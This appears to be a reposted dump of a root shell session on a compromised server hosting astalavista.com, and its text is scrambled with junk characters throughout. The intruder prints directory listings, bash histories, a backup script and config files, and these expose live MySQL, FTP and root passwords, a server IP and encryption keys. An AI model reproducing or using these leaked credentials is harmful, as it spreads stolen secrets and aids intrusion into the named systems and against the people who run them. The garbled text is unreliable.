3 v8 N% C9 m; d& F2 A3 t" X8 c#####################################################
9 r8 A, _' X' m" {#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #: ]- s# m2 j/ O N- g% ^. f/ O/ B
# |__| [__ | |__| | |__| | | | [__ | |__| #6 A% g- q" I, U" | q. C: @
# | | ___] | | | |___ | | \/ | ___] | | | #2 s% k1 a* s+ q8 X3 w0 A
# #
; B/ g- b j7 w/ W0 } w, P- `#####################################################/ [7 p& ^( I, M, A1 p
# #
2 o& m' c, }" N& n. m2 K" _* m3 l8 f# Admin Contact - 链接标记support@secureservertech.com #) w% C. j; D1 b, F8 c, W# d
# #
& C% Y- U2 E' q- H, K. l, i# Available ShortCuts #0 ]( V. R( m8 l. ?2 D( |; C2 I
# #
* l! Q, _8 W6 Z+ T+ x# nst - list active connections #" S8 A4 e i p) z" d7 e5 T; Q1 O4 e
# ddos - shows how many times each ip is connected #4 ]0 h7 E8 S2 U$ B' n% d$ L
# ltr - restart the webserver #
0 V8 O2 i# `2 Q, ~6 Z# phpc - edit the php config file #
8 h! v2 F& j% {: `# htc - edit the webserver configuration file #5 P+ C; ^9 m. i7 u( q7 q
# up - uptime #9 B6 Y% j+ P( c2 q; d1 G' h- H
# etd - edit the motd of the day file #( R! ]9 r. a7 o
# htr - start and restart apache if needed #' _7 [3 U/ c- I4 q/ }
# syng - shows active SYN_RECV connections #7 ?- Z4 j5 N' ^! D
# synd - syn flood blocker - “synd -h” for usage #* ^- c* b: u9 B; D( q5 O5 N: v4 O
#####################################################& {/ ^, I, A" x; R# D
# NOTES: #
) l' B) U3 p: }- R, g# Last Upgrade - 12-08-2008 by JF #
" y; v! F* x4 _0 G$ m# My.cnf/Mysql Optimization - 1-28-09 #; R* J& k0 S6 w% V
# #! j0 M8 o1 n8 p2 r5 w: P/ `
# #
- X' |8 d6 U) L- @' s4 z# #9 ]% Q6 B. q$ I
#####################################################
4 M+ [1 \4 u+ x x) Q; [9 l7 X" c4 x
# }8 j1 A4 @# v2 S) Rsh-3.2# lastlog | grep -v Never
1 c! P. v c, z. X) mUsername Port From Latest
3 u% `0 z* p9 p9 q$ Z. broot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009$ C1 ]8 g! t; |: |0 ]+ E% `" O C8 S
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
* X& K/ k8 D6 w. M5 F Qcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009) Q0 j( F5 R/ c! W) P2 A
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009/ V3 `5 d* Q4 D" G) S0 `+ Y, m
0 G& H4 D7 |# ^' l+ i# S
sh-3.2# ls -la% k# }! L" i d. q/ R. I$ b
total 453376; k3 Y% W4 J( V+ R: U/ @
drwxr-x— 15 root root 4096 Jun 4 08:40 .) l3 w& W, d. N& l6 x6 y$ v h5 E& K
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..( p9 n. K% D' j' l3 H7 I
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip% n7 P/ q T& b6 i9 Z$ Q
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
+ M5 A7 P* `" e0 l0 s: u-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
& c! J6 ^% y) C4 S: c-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout: y H9 L8 ^7 O! g
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile$ h2 \9 k# Y% h
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
! R" { L! ]+ W-rwx—— 1 root root 1899 Oct 28 2007 bk.sh2 U& x6 e$ L ]; f7 \' [3 `+ K8 g$ L
-rw-r–r– 1 root root 1327 Nov 29 2007 cert2 S3 [* W* g" W/ C
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql) M9 Q5 H1 S: D
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
$ p8 d7 n" i) V3 G-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc+ v% W; R0 L4 k. Q$ m/ E
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
5 q l; c) Z, B1 b+ L# ndrwx—— 2 root root 4096 Oct 28 2007 .elinks
# d, Q+ s4 w8 Q; E7 u6 Zdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
6 r- d c" ?$ W0 a-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2# r8 I0 `9 h: ^2 X
-rw——- 1 root root 0 Apr 16 13:19 .history
! ~2 i5 y" F. L! {. Z-rw-r–r– 1 root root 16095 Sep 11 2007 install.log4 |- [% r- P% F! y: C( s
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog8 |6 ^2 q5 N0 d! w. d+ I, ]+ z3 U1 K( E
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
: p! i8 C; U- \: _: P$ W9 }-rw——- 1 root root 35 Jun 2 14:23 .lesshst
( F. F! ?$ ]* g( d' @drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp! ~' |2 w" j0 i( E1 l# \
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec0 X+ K* y+ E- s5 G4 x/ i
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
! e# [. s* [4 w5 ^3 d" V+ P, p-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2. ]7 e4 o5 b' ?1 ?: j0 A
-rwx—— 1 root root 760 Sep 18 2008 lp& S7 e, r1 u/ K, ?7 t/ F
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
% V) ^% u P- M( ^( j$ `9 @-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz$ i, f# n$ H. ?6 M% P
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
5 _9 J9 z y! C* a+ Hdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
1 E' I5 a5 w. T-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz" M. R+ D7 u; k' z! B0 |1 d1 ]
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
6 p1 Z! n6 D' l7 C4 _-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
. w3 o5 `1 e' n8 @8 d+ B-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh( f' @/ O. N) R! U9 L, A
-rw——- 1 root root 41 Oct 19 2007 .my.cnf- A& M# x5 U5 J2 W6 Z& n4 M
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history+ ~6 [5 O9 }; j' C% O) W
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport0 a' K3 E V. K: X
-rw——- 1 root root 41 May 20 2008 .mytop$ q' [* {/ H$ F; `# u. a+ V* M
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
* O/ m5 K% W$ ^0 L-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz! [4 P( V9 I/ H- O& y6 z
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
) {0 O2 @4 e" `( w3 I-rw——- 1 root root 1462 Sep 21 2007 opt.php
& V# @& D" ^; C: M-rw-r–r– 1 root root 3371 Sep 22 2007 p
( G9 T7 ~+ a4 d0 O, W-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz20 ^9 C$ Q/ S. \; a% U! p" a! g
-rw——- 1 root root 1024 Feb 3 21:32 .rnd4 N* j4 Y* m! \) Z* M& N% P
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr( ]" K+ k- ?) \) R
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
5 @ E' @3 `# Y6 K* ?drwx—— 2 root root 4096 Oct 10 2008 .ssh
2 r9 I2 g5 h6 B" S1 `-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat) _ T9 k* C2 m5 H
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc6 G# B% }+ }; f- V
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip& |% j6 s4 K+ f3 O, j4 W
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
: ]$ z9 i4 M" Cdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
' K6 q, n% Q+ s8 C5 _' m5 r-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh( j& j& Z0 j! c, A( C
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0% C6 w8 G* [% H% N# u
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2- _: m- B% s: |4 I4 E5 T3 e! _( ?' A
-rw——- 1 root root 12997 May 16 2008 .viminfo$ z0 }3 u+ }" N n
; }6 O5 L+ a# k' _! r: c% Osh-3.2# cat .bash_history/ t0 d/ E7 \. J$ l* [
[snip]: U# \4 @/ J3 g. S1 g: b" n, a$ E( K, g
wget cp4sst.com/sstlinux.tar.gz- w( J4 [5 {1 S5 U" H+ Y
tar zxvf sstlinux.tar.gz
! L3 @) K8 S- w4 |! |: w. v5 \6 Mcd linux-2.6.27.10) U" K _" `" S, O5 ^: U. X
sh install.sh
' t6 \- [8 m3 Pmake bzImage ; make modules ; make modules_install ; make install
3 \5 }, X6 q' G/ b* e4 N; e# ~make clean' [+ t) w2 R: a- N
service mysqld restart
& S% |7 I& n& g& N- S0 G9 l# F9 |( R: y[snip]
; O, ?% a4 J( X9 o$ |+ @- E5 g+ pcd /usr/sbin/
+ p! i3 [) D9 d0 D* Y: @chmod 4777 traceroute
$ `2 d( p+ u/ n: {# u2 p2 i# }5 Hchmod 4777 ping
% G3 x: ~$ v: i+ y$ ?( b' ptraceroute -I 链接标记[url]www.astalavista.ch[/url]
' B/ y- s+ N0 U9 K2 Y[snip]
: y& z F/ {0 d M+ c- Tvi /etc/csf/csf.conf
. U1 D# H+ P4 z1 o# I# |! }/ @# @ ytraceroute google.ch
. G c. @; H+ n0 `* W2 {; Nservice csf restart9 V8 K4 m, B4 ^* k+ P( U( Z1 C1 D( {
tracert google.ch
% w3 p: B) t- bservice csf restart' Z4 Z$ O: L8 T" ]' `: f% ^
traceroute 链接标记[url]www.google.ch[/url]
3 V% T" W6 x% [. {, E! @tracert 链接标记[url]www.google.ch[/url]
% R& x9 d0 ^$ m- R3 K p) htraceroute 链接标记[url]www.google.ch[/url]
S1 n5 m4 ~5 ]; t) ^( zlocate traceroute
/ p; L. n3 L1 _chown 4755 /bin/traceroute# U: W# c7 v) r* p
chown 4777 /bin/traceroute
8 ?% i3 N$ ?) o4 \: }1 y! dlocate ping n$ d) H8 c. F8 t. K
chown 4755 /bin/ping0 L; {1 A; F: |' N- p
chown 4777 /bin/ping" \( ^1 N- X& }$ n7 i3 x- V
cd /bin/5 X) H D$ L% _7 R
ls -ali | grep ping
8 w# U2 C- |& xchown root ping
/ d2 q- R: ~+ I# N! \% bchmod 4755 ping
8 `" J- g5 a' `: Z# K7 ]! mls -ali | grep traceroute0 c6 R, X( Y6 L9 w& B
chown root traceroute
% d g9 Q( ]" Q9 a! v2 y g+ q( \chmod 4755 traceroute) |" Z3 d! A) |+ a& M
ls -ali | grep traceroute# V7 \! d* F4 u% a: e
traceroute -I 链接标记[url]www.google.ch[/url]6 `% T$ n9 z$ c8 ^: {% N
traceroute 链接标记[url]www.google.ch[/url]; E/ M% m) s+ V; t
whois pmsantos.ch
# d* t: V! h+ g* @) c# `8 i- F[snip], m! N. |" o2 K$ C& _; L
mysql -h com_contrexx2_live < /root/defaultp_ports.sql- R, G! G: g( q1 b5 r7 P7 ~4 e( ?
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql* R1 a. H A% y
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql$ I m1 p- J8 e1 ]) l/ @0 }
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql0 x! ?+ [! D8 i0 R
top8 X7 h5 k( T5 W, f- ~
ping ssth.ch# J# I0 }# G+ s( T# [
ping asdlkfaljgasd???ljg???lasj.ch: S* T' A& V6 o6 H) A0 ?, L
ping asdlkfaljgasdlasj.ch* D- _, U8 v0 |' l
ping 链接标记[url]www.ssth.ch[/url]
+ p, a# {. m/ H. j2 [ping ssth.ch
6 I6 y4 x' j' o9 A+ d8 Hnslookup 链接标记[url]www.google.ch[/url]' ~. `, H) u: E" ?: U
nslookup 链接标记[url]www.ssth.ch[/url]$ V9 u1 X# c9 {2 R9 H
man nslookup
( J& G" \6 Z L- f/ V' \ping 链接标记[url]www.google.ch[/url]) s& E6 [9 D8 W+ ?/ K- C9 \
nslookup 链接标记[url]www.google.ch[/url]) Q3 h4 u& k: R( u" ^/ a9 C( ~
nslookup 链接标记[url]www.google.ch[/url]
# A+ P, J2 @3 n: P t9 G0 y0 S [nslookup salfjasdlf.ch
; {) i2 k+ A E/ P3 ?9 X; D' v$ @+ _[snip]
4 r0 _) \: R2 a+ [6 |openssl passwd -1 sadf
; K. q7 E% e/ v% g) V" ~openssl passwd -1 5cZNHstdTy
* A0 P R- f$ T0 w& F+ K4 ^5 h, ~mysql
* w G9 {" b# }* o0 d# W( O, omysql2 }3 z9 @/ N0 y" a$ x
locate proftp
" A; Y5 _( U2 \' R3 \vi /etc/proftpd.passwd
0 O% A& {. l; Q4 Dservice proftpd restart
8 Y) B; d( C$ n( A1 S, k/ Wlocate proftpd.conf! R6 y9 R6 }8 S+ Y, E
vi /etc/proftpd.conf
* d1 E1 G# O# z8 b9 g9 `vi /etc/proftpd.passwd- J% T7 a7 r, o- n3 e
service proftpd restart
# m5 x% t9 D+ M+ k& {5 f[snip]
3 ~1 v4 w H- W3 {7 L, t/bin/sh /home/com/backup_system/backup.sh+ N: k* [% z8 G6 H
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin. \& L o/ ^* `+ y2 \" f
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql0 I' h! T/ @5 ^+ _) P/ x; J$ X
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
1 B9 T% d8 Z1 j' \7 @1 a* ils -ali: q3 o! B7 A+ P0 k1 h2 C
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql' y# V% K L6 F! l) v
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql1 d6 k/ L4 }2 N+ f- u
crontab -l; j# I1 r. P X9 \: c' y4 s9 `
crontab -l
% I D2 Y- J% s* [+ O1 Xphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
. M* s/ T7 ]& c7 r! a+ P/home/com/public_html/modifications/cronjobs/exploits.sh
6 S _/ _. b+ W/ d& [wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]: w6 L( [" f2 k
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz T; b3 i" S8 ]- c! S* \' K1 H0 M
cd lsws-4.0.3
7 J3 }' J0 t/ h0 `% p! `! ]sh install.sh
+ ?5 h: G9 C- i1 ?- O+ nuptime
% ^3 G+ M; i9 w8 ^; N% t' h7 V4 fhdparm -tt /dev/sda* q6 R+ _ V$ _
iostat2 D1 [1 Z) o2 P. D
yum install iostat* S1 M9 K( U. z9 p$ J
iostat
/ c0 _' F& |1 M# h3 O( B! J% Iwhereis iostat! a% r6 k2 Z2 d* c- p6 Q
yjm clean all# P7 X- m' a. K+ O
yum clean all ; yum -y update4 ~9 W( d" {3 W" O
iostat
" _; o( v7 J$ t+ k3 L. oyum install systat/ B9 s+ K5 e1 t4 K0 \$ a- d' h1 r
rpm -qa | grep iostat/ ^, W2 B( V1 r, @7 k
rpm -qa | grep sysstat
$ H# ]; s1 r5 R: ^rpm -qa | grep systat
5 }& e4 k. j5 C Gdmesg -c
/ d0 I$ p4 C: j$ y+ X; |# {' `, O/ ^sysctl -p+ m: X" F2 J; h: L2 f
uname -r; i/ u- t! B: [+ Y# ]
cd /usr/src
# @% M# B2 o% L+ c2 C4 Pwget nix101.com/kernels/sstlinux.tar.gz( z9 n; m4 x: [: i0 E
shutdown -r now) w6 B# r8 H! Q2 K7 S/ D
nano -w /boot/grub/grub.conf
1 o. \# T+ {9 \5 O E8 f% U
9 z3 m; @+ I; @# p8 u4 s2 Gsh-3.2# cat .my.cnf
+ O/ k. o; s1 @3 @[client]. N; U% M+ {, B7 N: |
user=da_admin" u0 G# R6 ~) q
password=X9dctmRH
+ P6 g5 R: e& U) B' w; s
% F, u( k( y- m- t" s* C( Vsh-3.2# cat /home/com/backup_system/backup.sh
* Z% F! k$ X( R0 b' O$ @8 I- |#!/bin/sh
% K( W( k% z, r2 M' I: W# K#####################################################################, I& a. r4 U' w" @1 j `% p8 \
# #
. f+ P. o9 H, r# incremental backup for astalavista.com #
& m- G: t: I3 H/ y4 `$ V2 E; u# #4 ~- Q8 |* k( y% D& K; k
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
- |$ _4 e: ^! ^/ Q$ I# #
2 e1 D/ }# a0 Z' ?) U2 _#####################################################################
# p+ w9 \# L3 `! Z[snip]3 u$ q5 w, q {( ^2 u
PROG_DIR=”/home/com/backup_system”;
/ S6 c- D/ M2 [! o% E# _BACKUP_DIR=”/home/com/backups”;
, R. m" a* w L' U. N" VDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
6 g6 A) v$ q/ F# ftp for synology backup server
- ?; j+ L. n- [ M* RFTP_HOST=”212.254.194.163″;
! c$ X3 O+ ^5 MFTP_PORT=”21″;
. ]: z- ~; b3 H0 ^FTP_USER=”astalavista.com”;
0 Y0 d' j' g7 p2 |FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;; I9 w. k! t5 r5 i! A
FTP_DIR=”/astalavista.com”;
+ G7 j* l# J$ D" X# [* d. O# database* w# z+ @. P# f
DB_HOST=”localhost”;
0 P+ v9 J# d) [6 n. YDB_USER=”contrexxuser2″;
; Q& r L* ^7 g, [. E% j2 x/ w2 IDB_PASS=”0fEYNZgXz1pKe”;) Q( O2 K% x( x( T/ f0 G+ R1 m
DB_DATABASE1=”com_contrexx2_live”;4 H$ _. A( x T2 I& ]% ~
DB_DATABASE2=”com_contrexx2″;) {$ Y0 b; r* ~, R I6 @" } u. ?9 {
[snip] b, y6 a0 k! X+ L8 P0 E4 d2 a0 n
ftp -in $FTP_HOST $FTP_PORT <<EOF
0 W3 g" e3 k$ B4 N, yquote USER $FTP_USER& @5 F: t7 ^0 C( G
quote PASS $FTP_PASS b* b3 B1 b9 I, ]; Q8 r
cd $FTP_DIR% a% t5 q2 [2 k$ H( m0 o" Q
put $DB_FULLNAME-SQL_Dump.tar
$ C5 L' w: W. Y6 r" X" }put $BACKUP_FULLNAME-Public_HTML.tar1 f: C& M$ ] o2 c; f* S. ^7 u
close
7 R: S( Z4 d7 _bye/ R" e# ]/ r5 ^5 f7 X
EOF4 H. m% R1 Z' X2 b
+ T) d9 Q% b# ~/ `6 ~
sh-3.2# cd /home
* X! V! G S1 P- J' x' q$ S* ^sh-3.2# ls -la8 Y. L) ?1 N! `; H# S3 ^
total 120! u( c& `7 h0 L
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
' @8 j1 |6 u6 a4 t0 k# c6 Gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..* A6 S% @/ e+ |9 C+ @7 K8 b
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
$ w0 H7 U" Y# _; _; L-rw——- 1 root root 8192 Jun 4 03:03 aquota.group. ~2 ]0 s& I4 j- V
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user2 d( ~- p! x4 b8 P
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet: I4 ]/ T) ?9 P+ x* z
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
1 q2 i) M. R* t' Y8 h) O* s4 Mdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
" N: g' f; k, E/ k4 |: B1 a# | G8 Idrwx–x–x 10 com com 4096 Apr 28 12:40 com
( h5 {/ ` J; W4 s) q# q/ tdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
+ l* c% O9 H! V; Ldrwx—— 3 jon jon 4096 Sep 21 2007 jon7 C! E0 {9 T4 L
drwx—— 2 root root 16384 Sep 11 2007 lost+found
" y, `" g" ^4 |/ `0 ldrwxr-xr-x 2 root root 4096 Sep 14 2007 my1 D: G2 t9 b3 l9 H/ j" z2 ^
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata. K/ j& Z: ~3 C
drwx—— 2 jon jon 4096 Sep 15 2007 test7 Z$ _ L7 U* \% B- w
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp$ X- |' ~( l. U) i. d/ A
3 `9 C+ R9 Y+ Q ?' M8 Tsh-3.2# cd admin* e: ?+ _- T5 s' u8 e; a/ B' _
sh-3.2# ls -la' r# M; G4 |- D9 H: m
total 1735896
% o: P: J+ d' W+ S6 P) m6 tdrwx–x–x 9 admin admin 4096 Nov 28 2007 .
1 O- I1 A$ y5 g! }1 Z7 L' P8 V3 Edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 o6 `/ M7 Y- @- r% x' Ydrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups }! x; S1 u/ q) Q/ |# I7 K6 w
drwx—— 2 admin admin 4096 Sep 28 2007 backups/ l( \% k+ b N4 ~, B9 d" B
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history
7 |/ P+ @* L+ ~/ W1 |- z-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout0 s" H( W7 S0 h
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile& D; R5 g6 {5 _. X3 q( d9 R
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc- @! {' x5 w/ S* x
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups0 P6 G. l0 u1 F6 v: W
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains7 w: N$ X: T- o3 h- c4 D# N3 |5 D
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap, J* f2 J* L; p( i/ M9 A
-rw-r–r– 1 root root 24 Sep 21 2007 info.php6 v& |5 A# r8 Q
drwx—— 2 admin admin 4096 Sep 21 2007 mail
c0 [$ c2 ^ |7 Z6 O7 S-rw-r–r– 1 root root 716 Nov 28 2007 server.csr1 \* |8 s2 U/ j2 @/ e% F" g
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
4 H, n( G* g) a) ^; w; z0 F# k-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow$ r* w& e% H$ ?6 U
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz3 \ Y$ F8 O" l1 @2 G' h
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups- f# o; W$ I( V3 H7 ?/ S9 U- a
1 u+ t9 a; D4 u+ x" e9 z/ T" j
sh-3.2# ..: I2 U `' c2 G
sh-3.2# cd jon+ ~+ D9 c. M& Y! _
sh-3.2# ls -la. P% j+ E% x4 [
total 36, S. B( l% J0 S" f6 y
drwx—— 3 jon jon 4096 Sep 21 2007 .
r" g0 @( C- B4 Bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
7 z9 K- F! N# F6 `* f# u" C-rw——- 1 jon jon 53 Sep 21 2007 .bash_history. w z' b1 {8 o
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
; b: o7 _; G( {. i. g8 c R5 S2 m' k-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
7 Z8 P! ]7 w2 t" V6 q4 t6 E$ O5 o+ t/ V-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
& E0 T% `/ ]" a" n-rw-r–r– 1 root root 24 Sep 21 2007 info.php
) A0 |' |2 W$ gdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
5 R7 i- y" o6 A; |& C2 y6 Q. p$ z! h! n- Y) T* W g
sh-3.2# cd ..2 \4 {7 I9 `$ s' ~9 \! g; U
sh-3.2# cd test
T" z2 C, G: g( ? C2 m, H# gsh-3.2# ls -la
8 h8 _7 ^& @2 I; ?- d0 U& etotal 48
4 B) Q! @4 L: c+ \ @$ M; Adrwx—— 2 jon jon 4096 Sep 15 2007 .
0 n7 H* v& k/ g8 adrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
8 n8 l0 C) i/ J( y-rw——- 1 jon jon 79 Sep 21 2007 .bash_history5 C5 E' H# T u B
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
' W4 N! v9 ?# H0 \1 q& Z$ N' O4 ?) i-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
$ {9 \" ]8 n% c$ a: w; e p-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc$ p! {. ~; R/ G" G' F7 [* j+ _% e4 d
sh-3.2# cat .bash_history/ e1 Y: j/ ^( y+ D2 ]; ~- p! a3 p
/usr/bin/mysqladmin -u root password PoliuJhytg67
( D' Q8 q9 v$ \( O, d2 `7 ~: W0 \
8 `! p( i' a8 e, G# u8 g) vsh-3.2# cd .." n2 P; E! k: N& Y) Z; X
sh-3.2# cd astanet
/ j+ D- k+ V: }' ash-3.2# ls -la: c2 S/ `0 Z5 g1 O0 l# z- l
total 52
8 U, A4 N& M: W& O& i' Rdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
% i6 ~7 s0 ~( d3 |drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
. f4 m: L7 D1 R9 x) K* Sdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth. e& R. C) r! T
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history3 ~. u! R0 E- ?6 o. P$ q
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout+ Q, L' M( P% V+ ?- _+ ]: \
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile9 f( `$ f0 ~* _: @6 I0 D( B
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
# t1 V( O: P0 j% [drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
+ x( X2 T. A1 W7 f, |! j! ^drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap) t4 |. |& w9 Q
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail* y8 ]0 o; d @" z" H9 ]
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history% a4 v3 V- j$ z1 Y U9 O0 t/ D
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
0 ?6 |' q5 u5 D+ C-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow5 @$ S0 ~- g$ e l2 t+ c7 J3 N
7 _/ a+ R1 W% h6 E# Psh-3.2# cd auth/
# w1 Q, x/ l' b6 Jsh-3.2# ls -la
( b0 K- w3 f1 ]2 _ v/ Ftotal 28: C1 D, N0 Y; G
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .1 I+ K" ~: c1 C& r% b
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
8 g( K6 I3 c |4 `" C1 B4 H6 }, ]. r) K-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php% i8 u( h; `; ~% G' W) b& H% D
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php9 y( y4 {) W9 @: q @( m0 \6 _% N& I
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
. L" h* f1 t- E5 Q4 k-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
$ t& R6 c3 U; D! }0 _3 Z! ]-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd) J( m* a/ O4 |: ?5 L
+ \6 Q. I; e; V$ b" X
sh-3.2# cat hackercontest.config.inc.php: N1 _# d* h. W1 H( R2 j
<?PHP* P( L# M1 s, Z8 E2 ~. {% p( l
// Variabeln f?r Verbindung zur Datenbank //
3 z# o$ H, o* {5 W! T$conxHost = ‘localhost’; // MySQL hostname' R* p% U. z" f) e. Z( ^5 q
$conxUser = ‘hackercontest’; // MySQL user
$ z8 Q& o( i) C* g3 e7 o$conxPassword = ‘K6m@7dUc’; // MySQL password
2 i4 \' Q0 l! @' u$ q( U$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish3 M, F2 M U6 Q4 I6 D5 | E) x: z
?>
3 i. q3 l+ k9 h/ \& Xsh-3.2# cat hosting.config.inc.php
9 a$ ^0 S6 ]( g) ]& v4 @<?PHP
3 J4 v* {, ~9 o$ @# |/ M// Variabeln f?r Verbindung zur Datenbank //: Q$ T" V; O7 z% g' ?
$conxHost = ‘localhost’; // MySQL hostname
5 _. |) A" a$ t" }, O$conxUser = ‘hostinguser’; // MySQL user; q6 F. p c P$ k
$conxPassword = ‘cXvB3981′; // MySQL password" b$ m& Q A, T" O+ a
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish9 V# A0 z9 P6 @, d! x W. ^- h
?>
7 Q1 s& `/ U) d& t9 a5 `- @4 H- G' E7 a8 i% i% c
